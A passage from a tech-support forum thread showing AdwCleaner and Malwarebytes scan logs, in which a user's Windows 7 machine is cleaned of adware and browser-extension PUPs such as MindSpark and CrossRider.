    [-] File Deleted : C:\Users\Guest\AppData\Local\Google\Chrome\User Data\Default\Local Storage\hxxp_fromdoctopdf.dl.myway.com_0.localstorage
    [-] File Deleted : C:\Users\Guest\AppData\Local\Google\Chrome\User Data\Default\Local Storage\hxxp_fromdoctopdf.dl.myway.com_0.localstorage-journal
    [-] File Deleted : C:\Users\Guest\AppData\Local\Google\Chrome\User Data\Default\Local Storage\hxxp_fromdoctopdf.dl.tb.ask.com_0.localstorage
    [-] File Deleted : C:\Users\Guest\AppData\Local\Google\Chrome\User Data\Default\Local Storage\hxxp_fromdoctopdf.dl.tb.ask.com_0.localstorage-journal
    [-] File Deleted : C:\Users\WELCOME\AppData\Local\Google\Chrome\User Data\Default\Local Storage\chrome-extension_mallpejgeafdahhflmliiahjdpgbegpk_0.localstorage
    [#] File Deleted : C:\Users\WELCOME\AppData\Local\Google\Chrome\User Data\Default\Local Storage\chrome-extension_mallpejgeafdahhflmliiahjdpgbegpk_0.localstorage
    [-] File Deleted : C:\Users\WELCOME\AppData\Local\Google\Chrome\User Data\Default\Local Storage\hxxp_www.tradeadexchange.com_0.localstorage

    ***** [ DLLs ] *****


    ***** [ Shortcuts ] *****


    ***** [ Scheduled tasks ] *****


    ***** [ Registry ] *****

    [-] Key Deleted : HKLM\SOFTWARE\Classes\CLSID\{61AB12E1-A5FF-11D1-B2E9-444553540000}
    [-] Key Deleted : HKLM\SOFTWARE\Classes\CLSID\{82351441-9094-11D1-A24B-00A0C932C7DF}
    [-] Key Deleted : HKLM\SOFTWARE\Classes\CLSID\{3CCC052E-BDEE-408A-BEA7-90914EF2964B}
    [-] Key Deleted : HKLM\SOFTWARE\Classes\CLSID\{61F47056-E400-43D3-AF1E-AB7DFFD4C4AD}
    [-] Key Deleted : HKLM\SOFTWARE\Classes\CLSID\{E2B98EEA-EE55-4E9B-A8C1-6E5288DF785A}
    [-] Key Deleted : HKLM\SOFTWARE\Classes\CLSID\{B821BF60-5C2D-41EB-92DC-3E4CCD3A22E4}
    [-] Key Deleted : HKLM\SOFTWARE\Classes\CLSID\{6DC82D15-92F2-11D1-A255-00A0C932C7DF}
    [-] Key Deleted : HKLM\SOFTWARE\Classes\TypeLib\{82351433-9094-11D1-A24B-00A0C932C7DF}
    [-] Key Deleted : HKCU\Software\Microsoft\Windows\CurrentVersion\Ext\Stats\{B821BF60-5C2D-41EB-92DC-3E4CCD3A22E4}
    [-] Key Deleted : HKCU\Software\Microsoft\Windows\CurrentVersion\Ext\Settings\{B821BF60-5C2D-41EB-92DC-3E4CCD3A22E4}
    [-] Key Deleted : HKLM\SOFTWARE\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{62155D33-3CE2-401E-8967-5A270628A3D5}
    [-] Key Deleted : HKLM\SOFTWARE\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{B821BF60-5C2D-41EB-92DC-3E4CCD3A22E4}
    [-] Key Deleted : [x64] HKLM\SOFTWARE\Classes\CLSID\{B821BF60-5C2D-41EB-92DC-3E4CCD3A22E4}
    [-] Key Deleted : [x64] HKLM\SOFTWARE\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{62155D33-3CE2-401E-8967-5A270628A3D5}
    [-] Key Deleted : [x64] HKLM\SOFTWARE\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{B821BF60-5C2D-41EB-92DC-3E4CCD3A22E4}
    [-] Key Deleted : HKCU\Software\SpeedBit
    [-] Key Deleted : HKLM\SOFTWARE\SpeedBit
    [-] Key Deleted : HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Toolbar Cleaner
    [-] Key Deleted : HKU\.DEFAULT\Software\SpeedBit
    [-] Value Deleted : HKLM\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\FirewallRules [{025B1FA6-BEFB-4EA5-B33C-D865EA3B6CE4}]
    [-] Value Deleted : HKLM\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\FirewallRules [{BE9D44D5-C882-456E-93EB-E21083969B3C}]

    ***** [ Web browsers ] *****

    [-] [C:\Users\WELCOME\AppData\Local\Google\Chrome\User Data\Default\Secure Preferences] [Extension] Deleted : mallpejgeafdahhflmliiahjdpgbegpk
    [-] [C:\Users\WELCOME\AppData\Local\Google\Chrome\User Data\Default\Secure Preferences] [Extension] Deleted : mallpejgeafdahhflmliiahjdpgbegpk
    [-] [C:\Users\Guest\AppData\Local\Google\Chrome\User Data\Default\Secure Preferences] [Extension] Deleted : mallpejgeafdahhflmliiahjdpgbegpk
    [-] [C:\Users\Guest\AppData\Local\Google\Chrome\User Data\Default\Secure Preferences] [Extension] Deleted : mallpejgeafdahhflmliiahjdpgbegpk

    *************************

    :: "Tracing" keys removed
    :: Winsock settings cleared

    *************************

    C:\Program Files (x86)\AdwCleaner\AdwCleaner[C1].txt - [5713 bytes] - [14/03/2016 18:19:51]
    C:\Program Files (x86)\AdwCleaner\AdwCleaner[S1].txt - [5676 bytes] - [14/03/2016 18:16:05]

    ########## EOF - C:\Program Files (x86)\AdwCleaner\AdwCleaner[C1].txt - [5899 bytes] ##########
     
  11. blackclaw96

    blackclaw96 TS Rookie Topic Starter

    Malwarebytes Anti-Malware
    www.malwarebytes.org

    Scan Date: 14-03-2016
    Scan Time: 18:30
    Logfile: mbam.txt
    Administrator: Yes

    Version: 2.2.0.1024
    Malware Database: v2016.03.14.03
    Rootkit Database: v2016.03.12.01
    License: Free
    Malware Protection: Disabled
    Malicious Website Protection: Disabled
    Self-protection: Disabled

    OS: Windows 7 Service Pack 1
    CPU: x64
    File System: NTFS
    User: WELCOME

    Scan Type: Threat Scan
    Result: Completed
    Objects Scanned: 440497
    Time Elapsed: 9 min, 12 sec

    Memory: Enabled
    Startup: Enabled
    Filesystem: Enabled
    Archives: Enabled
    Rootkits: Disabled
    Heuristics: Enabled
    PUP: Enabled
    PUM: Enabled

    Processes: 0
    (No malicious items detected)

    Modules: 0
    (No malicious items detected)

    Registry Keys: 0
    (No malicious items detected)

    Registry Values: 0
    (No malicious items detected)

    Registry Data: 0
    (No malicious items detected)

    Folders: 85
    PUP.Optional.MindSpark, C:\Users\WELCOME\AppData\Local\Google\Chrome\User Data\Default\Extensions\mallpejgeafdahhflmliiahjdpgbegpk\12.20.8.64773_0, Quarantined, [cdde81063366e5512c3bbb8311f4d729],
    PUP.Optional.MindSpark, C:\Users\WELCOME\AppData\Local\Google\Chrome\User Data\Default\Extensions\mallpejgeafdahhflmliiahjdpgbegpk\12.20.8.64773_0\common, Quarantined, [cdde81063366e5512c3bbb8311f4d729],
    PUP.Optional.MindSpark, C:\Users\WELCOME\AppData\Local\Google\Chrome\User Data\Default\Extensions\mallpejgeafdahhflmliiahjdpgbegpk\12.20.8.64773_0\common\adapter, Quarantined, [cdde81063366e5512c3bbb8311f4d729],
    PUP.Optional.MindSpark, C:\Users\WELCOME\AppData\Local\Google\Chrome\User Data\Default\Extensions\mallpejgeafdahhflmliiahjdpgbegpk\12.20.8.64773_0\common\components, Quarantined, [cdde81063366e5512c3bbb8311f4d729],
    PUP.Optional.MindSpark, C:\Users\WELCOME\AppData\Local\Google\Chrome\User Data\Default\Extensions\mallpejgeafdahhflmliiahjdpgbegpk\12.20.8.64773_0\common\components\abstractbutton, Quarantined, [cdde81063366e5512c3bbb8311f4d729],
    PUP.Optional.MindSpark, C:\Users\WELCOME\AppData\Local\Google\Chrome\User Data\Default\Extensions\mallpejgeafdahhflmliiahjdpgbegpk\12.20.8.64773_0\common\components\abstractbutton\background, Quarantined, [cdde81063366e5512c3bbb8311f4d729],
    PUP.Optional.MindSpark, C:\Users\WELCOME\AppData\Local\Google\Chrome\User Data\Default\Extensions\mallpejgeafdahhflmliiahjdpgbegpk\12.20.8.64773_0\common\components\alert, Quarantined, [cdde81063366e5512c3bbb8311f4d729],
    PUP.Optional.MindSpark, C:\Users\WELCOME\AppData\Local\Google\Chrome\User Data\Default\Extensions\mallpejgeafdahhflmliiahjdpgbegpk\12.20.8.64773_0\common\components\alert\background, Quarantined, [cdde81063366e5512c3bbb8311f4d729],
    PUP.Optional.MindSpark, C:\Users\WELCOME\AppData\Local\Google\Chrome\User Data\Default\Extensions\mallpejgeafdahhflmliiahjdpgbegpk\12.20.8.64773_0\common\components\embedhtml, Quarantined, [cdde81063366e5512c3bbb8311f4d729],
    PUP.Optional.MindSpark, C:\Users\WELCOME\AppData\Local\Google\Chrome\User Data\Default\Extensions\mallpejgeafdahhflmliiahjdpgbegpk\12.20.8.64773_0\common\components\embedhtml\background, Quarantined, [cdde81063366e5512c3bbb8311f4d729],
    PUP.Optional.MindSpark, C:\Users\WELCOME\AppData\Local\Google\Chrome\User Data\Default\Extensions\mallpejgeafdahhflmliiahjdpgbegpk\12.20.8.64773_0\common\components\embedhtml\html, Quarantined, [cdde81063366e5512c3bbb8311f4d729],
    PUP.Optional.MindSpark, C:\Users\WELCOME\AppData\Local\Google\Chrome\User Data\Default\Extensions\mallpejgeafdahhflmliiahjdpgbegpk\12.20.8.64773_0\common\components\embedhtml\js, Quarantined, [cdde81063366e5512c3bbb8311f4d729],
    PUP.Optional.MindSpark, C:\Users\WELCOME\AppData\Local\Google\Chrome\User Data\Default\Extensions\mallpejgeafdahhflmliiahjdpgbegpk\12.20.8.64773_0\common\components\embedscript, Quarantined, [cdde81063366e5512c3bbb8311f4d729],
    PUP.Optional.MindSpark, C:\Users\WELCOME\AppData\Local\Google\Chrome\User Data\Default\Extensions\mallpejgeafdahhflmliiahjdpgbegpk\12.20.8.64773_0\common\components\embedscript\background, Quarantined, [cdde81063366e5512c3bbb8311f4d729],
    PUP.Optional.MindSpark, C:\Users\WELCOME\AppData\Local\Google\Chrome\User Data\Default\Extensions\mallpejgeafdahhflmliiahjdpgbegpk\12.20.8.64773_0\common\components\embedscript\html, Quarantined, [cdde81063366e5512c3bbb8311f4d729],
    PUP.Optional.MindSpark, C:\Users\WELCOME\AppData\Local\Google\Chrome\User Data\Default\Extensions\mallpejgeafdahhflmliiahjdpgbegpk\12.20.8.64773_0\common\components\embedscript\js, Quarantined, [cdde81063366e5512c3bbb8311f4d729],
    PUP.Optional.MindSpark, C:\Users\WELCOME\AppData\Local\Google\Chrome\User Data\Default\Extensions\mallpejgeafdahhflmliiahjdpgbegpk\12.20.8.64773_0\common\components\flare, Quarantined, [cdde81063366e5512c3bbb8311f4d729],
    PUP.Optional.MindSpark, C:\Users\WELCOME\AppData\Local\Google\Chrome\User Data\Default\Extensions\mallpejgeafdahhflmliiahjdpgbegpk\12.20.8.64773_0\common\components\flare\background, Quarantined, [cdde81063366e5512c3bbb8311f4d729],
    PUP.Optional.MindSpark, C:\Users\WELCOME\AppData\Local\Google\Chrome\User Data\Default\Extensions\mallpejgeafdahhflmliiahjdpgbegpk\12.20.8.64773_0\common\components\flare\icons, Quarantined, [cdde81063366e5512c3bbb8311f4d729],
    PUP.Optional.MindSpark, C:\Users\WELCOME\AppData\Local\Google\Chrome\User Data\Default\Extensions\mallpejgeafdahhflmliiahjdpgbegpk\12.20.8.64773_0\common\components\generic, Quarantined, [cdde81063366e5512c3bbb8311f4d729],
    PUP.Optional.MindSpark, C:\Users\WELCOME\AppData\Local\Google\Chrome\User Data\Default\Extensions\mallpejgeafdahhflmliiahjdpgbegpk\12.20.8.64773_0\common\components\generic\background, Quarantined, [cdde81063366e5512c3bbb8311f4d729],
    PUP.Optional.MindSpark, C:\Users\WELCOME\AppData\Local\Google\Chrome\User Data\Default\Extensions\mallpejgeafdahhflmliiahjdpgbegpk\12.20.8.64773_0\common\components\link, Quarantined, [cdde81063366e5512c3bbb8311f4d729],
    PUP.Optional.MindSpark, C:\Users\WELCOME\AppData\Local\Google\Chrome\User Data\Default\Extensions\mallpejgeafdahhflmliiahjdpgbegpk\12.20.8.64773_0\common\components\link\background, Quarantined, [cdde81063366e5512c3bbb8311f4d729],
    PUP.Optional.MindSpark, C:\Users\WELCOME\AppData\Local\Google\Chrome\User Data\Default\Extensions\mallpejgeafdahhflmliiahjdpgbegpk\12.20.8.64773_0\common\components\menu, Quarantined, [cdde81063366e5512c3bbb8311f4d729],
    PUP.Optional.MindSpark, C:\Users\WELCOME\AppData\Local\Google\Chrome\User Data\Default\Extensions\mallpejgeafdahhflmliiahjdpgbegpk\12.20.8.64773_0\common\components\menu\background, Quarantined, [cdde81063366e5512c3bbb8311f4d729],
    PUP.Optional.MindSpark, C:\Users\WELCOME\AppData\Local\Google\Chrome\User Data\Default\Extensions\mallpejgeafdahhflmliiahjdpgbegpk\12.20.8.64773_0\common\components\menu\css, Quarantined, [cdde81063366e5512c3bbb8311f4d729],
    PUP.Optional.MindSpark, C:\Users\WELCOME\AppData\Local\Google\Chrome\User Data\Default\Extensions\mallpejgeafdahhflmliiahjdpgbegpk\12.20.8.64773_0\common\components\menu\html, Quarantined, [cdde81063366e5512c3bbb8311f4d729],
    PUP.Optional.MindSpark, C:\Users\WELCOME\AppData\Local\Google\Chrome\User Data\Default\Extensions\mallpejgeafdahhflmliiahjdpgbegpk\12.20.8.64773_0\common\components\menu\images, Quarantined, [cdde81063366e5512c3bbb8311f4d729],
    PUP.Optional.MindSpark, C:\Users\WELCOME\AppData\Local\Google\Chrome\User Data\Default\Extensions\mallpejgeafdahhflmliiahjdpgbegpk\12.20.8.64773_0\common\components\menu\js, Quarantined, [cdde81063366e5512c3bbb8311f4d729],
    PUP.Optional.MindSpark, C:\Users\WELCOME\AppData\Local\Google\Chrome\User Data\Default\Extensions\mallpejgeafdahhflmliiahjdpgbegpk\12.20.8.64773_0\common\components\rss, Quarantined, [cdde81063366e5512c3bbb8311f4d729],
    PUP.Optional.MindSpark, C:\Users\WELCOME\AppData\Local\Google\Chrome\User Data\Default\Extensions\mallpejgeafdahhflmliiahjdpgbegpk\12.20.8.64773_0\common\components\rss\background, Quarantined, [cdde81063366e5512c3bbb8311f4d729],
    PUP.Optional.MindSpark, C:\Users\WELCOME\AppData\Local\Google\Chrome\User Data\Default\Extensions\mallpejgeafdahhflmliiahjdpgbegpk\12.20.8.64773_0\common\components\thirdparty, Quarantined, [cdde81063366e5512c3bbb8311f4d729],
    PUP.Optional.MindSpark, C:\Users\WELCOME\AppData\Local\Google\Chrome\User Data\Default\Extensions\mallpejgeafdahhflmliiahjdpgbegpk\12.20.8.64773_0\common\components\thirdparty\background, Quarantined, [cdde81063366e5512c3bbb8311f4d729],
    PUP.Optional.MindSpark, C:\Users\WELCOME\AppData\Local\Google\Chrome\User Data\Default\Extensions\mallpejgeafdahhflmliiahjdpgbegpk\12.20.8.64773_0\common\components\uninstall, Quarantined, [cdde81063366e5512c3bbb8311f4d729],
    PUP.Optional.MindSpark, C:\Users\WELCOME\AppData\Local\Google\Chrome\User Data\Default\Extensions\mallpejgeafdahhflmliiahjdpgbegpk\12.20.8.64773_0\common\components\uninstall\background, Quarantined, [cdde81063366e5512c3bbb8311f4d729],
    PUP.Optional.MindSpark, C:\Users\WELCOME\AppData\Local\Google\Chrome\User Data\Default\Extensions\mallpejgeafdahhflmliiahjdpgbegpk\12.20.8.64773_0\common\components\weather, Quarantined, [cdde81063366e5512c3bbb8311f4d729],
    PUP.Optional.MindSpark, C:\Users\WELCOME\AppData\Local\Google\Chrome\User Data\Default\Extensions\mallpejgeafdahhflmliiahjdpgbegpk\12.20.8.64773_0\common\components\weather\background, Quarantined, [cdde81063366e5512c3bbb8311f4d729],
    PUP.Optional.MindSpark, C:\Users\WELCOME\AppData\Local\Google\Chrome\User Data\Default\Extensions\mallpejgeafdahhflmliiahjdpgbegpk\12.20.8.64773_0\common\js, Quarantined, [cdde81063366e5512c3bbb8311f4d729],
    PUP.Optional.MindSpark, C:\Users\WELCOME\AppData\Local\Google\Chrome\User Data\Default\Extensions\mallpejgeafdahhflmliiahjdpgbegpk\12.20.8.64773_0\common\widget-api, Quarantined, [cdde81063366e5512c3bbb8311f4d729],
    PUP.Optional.MindSpark, C:\Users\WELCOME\AppData\Local\Google\Chrome\User Data\Default\Extensions\mallpejgeafdahhflmliiahjdpgbegpk\12.20.8.64773_0\common\widget-api\widgets, Quarantined, [cdde81063366e5512c3bbb8311f4d729],
    PUP.Optional.MindSpark, C:\Users\WELCOME\AppData\Local\Google\Chrome\User Data\Default\Extensions\mallpejgeafdahhflmliiahjdpgbegpk\12.20.8.64773_0\common\widget-api\widgets\common, Quarantined, [cdde81063366e5512c3bbb8311f4d729],
    PUP.Optional.MindSpark, C:\Users\WELCOME\AppData\Local\Google\Chrome\User Data\Default\Extensions\mallpejgeafdahhflmliiahjdpgbegpk\12.20.8.64773_0\common\widget-api\widgets\radio, Quarantined, [cdde81063366e5512c3bbb8311f4d729],
    PUP.Optional.MindSpark, C:\Users\WELCOME\AppData\Local\Google\Chrome\User Data\Default\Extensions\mallpejgeafdahhflmliiahjdpgbegpk\12.20.8.64773_0\common\widget-api\widgets\radio\css, Quarantined, [cdde81063366e5512c3bbb8311f4d729],
    PUP.Optional.MindSpark, C:\Users\WELCOME\AppData\Local\Google\Chrome\User Data\Default\Extensions\mallpejgeafdahhflmliiahjdpgbegpk\12.20.8.64773_0\common\widget-api\widgets\radio\js, Quarantined, [cdde81063366e5512c3bbb8311f4d729],
    PUP.Optional.MindSpark, C:\Users\WELCOME\AppData\Local\Google\Chrome\User Data\Default\Extensions\mallpejgeafdahhflmliiahjdpgbegpk\12.20.8.64773_0\common\widget-api\widgets\rss, Quarantined, [cdde81063366e5512c3bbb8311f4d729],
    PUP.Optional.MindSpark, C:\Users\WELCOME\AppData\Local\Google\Chrome\User Data\Default\Extensions\mallpejgeafdahhflmliiahjdpgbegpk\12.20.8.64773_0\common\widget-api\widgets\rss\js, Quarantined, [cdde81063366e5512c3bbb8311f4d729],
    PUP.Optional.MindSpark, C:\Users\WELCOME\AppData\Local\Google\Chrome\User Data\Default\Extensions\mallpejgeafdahhflmliiahjdpgbegpk\12.20.8.64773_0\common\widget-api\widgets\test, Quarantined, [cdde81063366e5512c3bbb8311f4d729],
    PUP.Optional.MindSpark, C:\Users\WELCOME\AppData\Local\Google\Chrome\User Data\Default\Extensions\mallpejgeafdahhflmliiahjdpgbegpk\12.20.8.64773_0\common\widget-api\widgets\topapps, Quarantined, [cdde81063366e5512c3bbb8311f4d729],
    PUP.Optional.MindSpark, C:\Users\WELCOME\AppData\Local\Google\Chrome\User Data\Default\Extensions\mallpejgeafdahhflmliiahjdpgbegpk\12.20.8.64773_0\common\widget-api\widgets\topapps\css, Quarantined, [cdde81063366e5512c3bbb8311f4d729],
    PUP.Optional.MindSpark, C:\Users\WELCOME\AppData\Local\Google\Chrome\User Data\Default\Extensions\mallpejgeafdahhflmliiahjdpgbegpk\12.20.8.64773_0\common\widget-api\widgets\topapps\js, Quarantined, [cdde81063366e5512c3bbb8311f4d729],
    PUP.Optional.MindSpark, C:\Users\WELCOME\AppData\Local\Google\Chrome\User Data\Default\Extensions\mallpejgeafdahhflmliiahjdpgbegpk\12.20.8.64773_0\common\widget-api\widgets\weather, Quarantined, [cdde81063366e5512c3bbb8311f4d729],
    PUP.Optional.MindSpark, C:\Users\WELCOME\AppData\Local\Google\Chrome\User Data\Default\Extensions\mallpejgeafdahhflmliiahjdpgbegpk\12.20.8.64773_0\common\widget-api\widgets\weather\css, Quarantined, [cdde81063366e5512c3bbb8311f4d729],
    PUP.Optional.MindSpark, C:\Users\WELCOME\AppData\Local\Google\Chrome\User Data\Default\Extensions\mallpejgeafdahhflmliiahjdpgbegpk\12.20.8.64773_0\common\widget-api\widgets\weather\js, Quarantined, [cdde81063366e5512c3bbb8311f4d729],
    PUP.Optional.MindSpark, C:\Users\WELCOME\AppData\Local\Google\Chrome\User Data\Default\Extensions\mallpejgeafdahhflmliiahjdpgbegpk\12.20.8.64773_0\components, Quarantined, [cdde81063366e5512c3bbb8311f4d729],
    PUP.Optional.MindSpark, C:\Users\WELCOME\AppData\Local\Google\Chrome\User Data\Default\Extensions\mallpejgeafdahhflmliiahjdpgbegpk\12.20.8.64773_0\components\api, Quarantined, [cdde81063366e5512c3bbb8311f4d729],
    PUP.Optional.MindSpark, C:\Users\WELCOME\AppData\Local\Google\Chrome\User Data\Default\Extensions\mallpejgeafdahhflmliiahjdpgbegpk\12.20.8.64773_0\components\api\background, Quarantined, [cdde81063366e5512c3bbb8311f4d729],
    PUP.Optional.MindSpark, C:\Users\WELCOME\AppData\Local\Google\Chrome\User Data\Default\Extensions\mallpejgeafdahhflmliiahjdpgbegpk\12.20.8.64773_0\components\api\window, Quarantined, [cdde81063366e5512c3bbb8311f4d729],
    PUP.Optional.MindSpark, C:\Users\WELCOME\AppData\Local\Google\Chrome\User Data\Default\Extensions\mallpejgeafdahhflmliiahjdpgbegpk\12.20.8.64773_0\components\defaultSearch, Quarantined, [cdde81063366e5512c3bbb8311f4d729],
    PUP.Optional.MindSpark, C:\Users\WELCOME\AppData\Local\Google\Chrome\User Data\Default\Extensions\mallpejgeafdahhflmliiahjdpgbegpk\12.20.8.64773_0\components\defaultSearch\background, Quarantined, [cdde81063366e5512c3bbb8311f4d729],
    PUP.Optional.MindSpark, C:\Users\WELCOME\AppData\Local\Google\Chrome\User Data\Default\Extensions\mallpejgeafdahhflmliiahjdpgbegpk\12.20.8.64773_0\components\defaultSearch\foreground, Quarantined, [cdde81063366e5512c3bbb8311f4d729],
    PUP.Optional.MindSpark, C:\Users\WELCOME\AppData\Local\Google\Chrome\User Data\Default\Extensions\mallpejgeafdahhflmliiahjdpgbegpk\12.20.8.64773_0\components\moviereviews, Quarantined, [cdde81063366e5512c3bbb8311f4d729],
    PUP.Optional.MindSpark, C:\Users\WELCOME\AppData\Local\Google\Chrome\User Data\Default\Extensions\mallpejgeafdahhflmliiahjdpgbegpk\12.20.8.64773_0\components\moviereviews\background, Quarantined, [cdde81063366e5512c3bbb8311f4d729],
    PUP.Optional.MindSpark, C:\Users\WELCOME\AppData\Local\Google\Chrome\User Data\Default\Extensions\mallpejgeafdahhflmliiahjdpgbegpk\12.20.8.64773_0\components\moviereviews\css, Quarantined, [cdde81063366e5512c3bbb8311f4d729],
    PUP.Optional.MindSpark, C:\Users\WELCOME\AppData\Local\Google\Chrome\User Data\Default\Extensions\mallpejgeafdahhflmliiahjdpgbegpk\12.20.8.64773_0\components\moviereviews\html, Quarantined, [cdde81063366e5512c3bbb8311f4d729],
    PUP.Optional.MindSpark, C:\Users\WELCOME\AppData\Local\Google\Chrome\User Data\Default\Extensions\mallpejgeafdahhflmliiahjdpgbegpk\12.20.8.64773_0\components\moviereviews\js, Quarantined, [cdde81063366e5512c3bbb8311f4d729],
    PUP.Optional.MindSpark, C:\Users\WELCOME\AppData\Local\Google\Chrome\User Data\Default\Extensions\mallpejgeafdahhflmliiahjdpgbegpk\12.20.8.64773_0\components\radio, Quarantined, [cdde81063366e5512c3bbb8311f4d729],
    PUP.Optional.MindSpark, C:\Users\WELCOME\AppData\Local\Google\Chrome\User Data\Default\Extensions\mallpejgeafdahhflmliiahjdpgbegpk\12.20.8.64773_0\components\radio\background, Quarantined, [cdde81063366e5512c3bbb8311f4d729],
    PUP.Optional.MindSpark, C:\Users\WELCOME\AppData\Local\Google\Chrome\User Data\Default\Extensions\mallpejgeafdahhflmliiahjdpgbegpk\12.20.8.64773_0\components\radio\css, Quarantined, [cdde81063366e5512c3bbb8311f4d729],
    PUP.Optional.MindSpark, C:\Users\WELCOME\AppData\Local\Google\Chrome\User Data\Default\Extensions\mallpejgeafdahhflmliiahjdpgbegpk\12.20.8.64773_0\components\radio\foreground, Quarantined, [cdde81063366e5512c3bbb8311f4d729],
    PUP.Optional.MindSpark, C:\Users\WELCOME\AppData\Local\Google\Chrome\User Data\Default\Extensions\mallpejgeafdahhflmliiahjdpgbegpk\12.20.8.64773_0\components\radio\radioWrapper, Quarantined, [cdde81063366e5512c3bbb8311f4d729],
    PUP.Optional.MindSpark, C:\Users\WELCOME\AppData\Local\Google\Chrome\User Data\Default\Extensions\mallpejgeafdahhflmliiahjdpgbegpk\12.20.8.64773_0\components\search, Quarantined, [cdde81063366e5512c3bbb8311f4d729],
    PUP.Optional.MindSpark, C:\Users\WELCOME\AppData\Local\Google\Chrome\User Data\Default\Extensions\mallpejgeafdahhflmliiahjdpgbegpk\12.20.8.64773_0\components\search\background, Quarantined, [cdde81063366e5512c3bbb8311f4d729],
    PUP.Optional.MindSpark, C:\Users\WELCOME\AppData\Local\Google\Chrome\User Data\Default\Extensions\mallpejgeafdahhflmliiahjdpgbegpk\12.20.8.64773_0\components\search\html, Quarantined, [cdde81063366e5512c3bbb8311f4d729],
    PUP.Optional.MindSpark, C:\Users\WELCOME\AppData\Local\Google\Chrome\User Data\Default\Extensions\mallpejgeafdahhflmliiahjdpgbegpk\12.20.8.64773_0\components\supertab, Quarantined, [cdde81063366e5512c3bbb8311f4d729],
    PUP.Optional.MindSpark, C:\Users\WELCOME\AppData\Local\Google\Chrome\User Data\Default\Extensions\mallpejgeafdahhflmliiahjdpgbegpk\12.20.8.64773_0\components\supertab\css, Quarantined, [cdde81063366e5512c3bbb8311f4d729],
    PUP.Optional.MindSpark, C:\Users\WELCOME\AppData\Local\Google\Chrome\User Data\Default\Extensions\mallpejgeafdahhflmliiahjdpgbegpk\12.20.8.64773_0\components\supertab\html, Quarantined, [cdde81063366e5512c3bbb8311f4d729],
    PUP.Optional.MindSpark, C:\Users\WELCOME\AppData\Local\Google\Chrome\User Data\Default\Extensions\mallpejgeafdahhflmliiahjdpgbegpk\12.20.8.64773_0\components\supertab\js, Quarantined, [cdde81063366e5512c3bbb8311f4d729],
    PUP.Optional.MindSpark, C:\Users\WELCOME\AppData\Local\Google\Chrome\User Data\Default\Extensions\mallpejgeafdahhflmliiahjdpgbegpk\12.20.8.64773_0\icons, Quarantined, [cdde81063366e5512c3bbb8311f4d729],
    PUP.Optional.MindSpark, C:\Users\WELCOME\AppData\Local\Google\Chrome\User Data\Default\Extensions\mallpejgeafdahhflmliiahjdpgbegpk\12.20.8.64773_0\images, Quarantined, [cdde81063366e5512c3bbb8311f4d729],
    PUP.Optional.MindSpark, C:\Users\WELCOME\AppData\Local\Google\Chrome\User Data\Default\Extensions\mallpejgeafdahhflmliiahjdpgbegpk\12.20.8.64773_0\js, Quarantined, [cdde81063366e5512c3bbb8311f4d729],
    PUP.Optional.MindSpark, C:\Users\WELCOME\AppData\Local\Google\Chrome\User Data\Default\Extensions\mallpejgeafdahhflmliiahjdpgbegpk\12.20.8.64773_0\native, Quarantined, [cdde81063366e5512c3bbb8311f4d729],
    PUP.Optional.MindSpark, C:\Users\WELCOME\AppData\Local\Google\Chrome\User Data\Default\Extensions\mallpejgeafdahhflmliiahjdpgbegpk\12.20.8.64773_0\native\libs, Quarantined, [cdde81063366e5512c3bbb8311f4d729],
    PUP.Optional.MindSpark, C:\Users\WELCOME\AppData\Local\Google\Chrome\User Data\Default\Extensions\mallpejgeafdahhflmliiahjdpgbegpk\12.20.8.64773_0\shared, Quarantined, [cdde81063366e5512c3bbb8311f4d729],
    PUP.Optional.MindSpark, C:\Users\WELCOME\AppData\Local\Google\Chrome\User Data\Default\Extensions\mallpejgeafdahhflmliiahjdpgbegpk\12.20.8.64773_0\_metadata, Quarantined, [cdde81063366e5512c3bbb8311f4d729],
    PUP.Optional.MindSpark, C:\Users\WELCOME\AppData\Local\Google\Chrome\User Data\Default\Extensions\mallpejgeafdahhflmliiahjdpgbegpk, Quarantined, [cdde81063366e5512c3bbb8311f4d729],

    Files: 241
    PUP.Optional.SaveFrom, C:\Users\WELCOME\AppData\Roaming\Mozilla\Firefox\Profiles\kesxh4v3.default\extensions\helper-sig@savefrom.net.xpi, Quarantined, [05a64344cdccc373ceed5edca460dc24],
    PUP.Optional.OnClickAds, C:\Users\WELCOME\AppData\Local\Google\Chrome\User Data\Default\Local Storage\http_onclickads.net_0.localstorage, Quarantined, [cedd00879702f54127b491eb31d30000],
    PUP.Optional.CrossRider, C:\Users\Guest\AppData\Local\Google\Chrome\User Data\Default\Local Storage\https_d19tqk5t6qcjac.cloudfront.net_0.localstorage, Quarantined, [505bf88fedac7abcda583a43030135cb],
    PUP.Optional.CrossRider, C:\Users\Guest\AppData\Local\Google\Chrome\User Data\Default\Local Storage\https_d19tqk5t6qcjac.cloudfront.net_0.localstorage-journal, Quarantined, [efbccfb8debb74c258da0d70f113d030],
    PUP.Optional.CrossRider, C:\Users\WELCOME\AppData\Local\Google\Chrome\User Data\Default\Local Storage\https_d19tqk5t6qcjac.cloudfront.net_0.localstorage, Quarantined, [cbe0bccb3168c472eb470e6f6f95d52b],
    PUP.Optional.CrossRider, C:\Users\Guest\AppData\Local\Google\Chrome\User Data\Default\Local Storage\http_cds.j4c2z9p8.hwcdn.net_0.localstorage, Quarantined, [e5c6c9bee1b8bb7b71ccccb2a163ec14],
    PUP.Optional.CrossRider, C:\Users\Guest\AppData\Local\Google\Chrome\User Data\Default\Local Storage\http_cds.j4c2z9p8.hwcdn.net_0.localstorage-journal, Quarantined, [5e4dd1b63465ca6c013ced9155afa65a],
    PUP.Optional.CrossRider, C:\Users\WELCOME\AppData\Local\Google\Chrome\User Data\Default\Local Storage\http_cds.j4c2z9p8.hwcdn.net_0.localstorage, Quarantined, [0e9da7e09603d6603ffeceb0f311d52b],
    PUP.Optional.MindSpark, C:\Users\WELCOME\AppData\Local\Google\Chrome\User Data\Default\Extensions\mallpejgeafdahhflmliiahjdpgbegpk\12.20.8.64773_0\manifest.json, Quarantined, [cdde81063366e5512c3bbb8311f4d729],
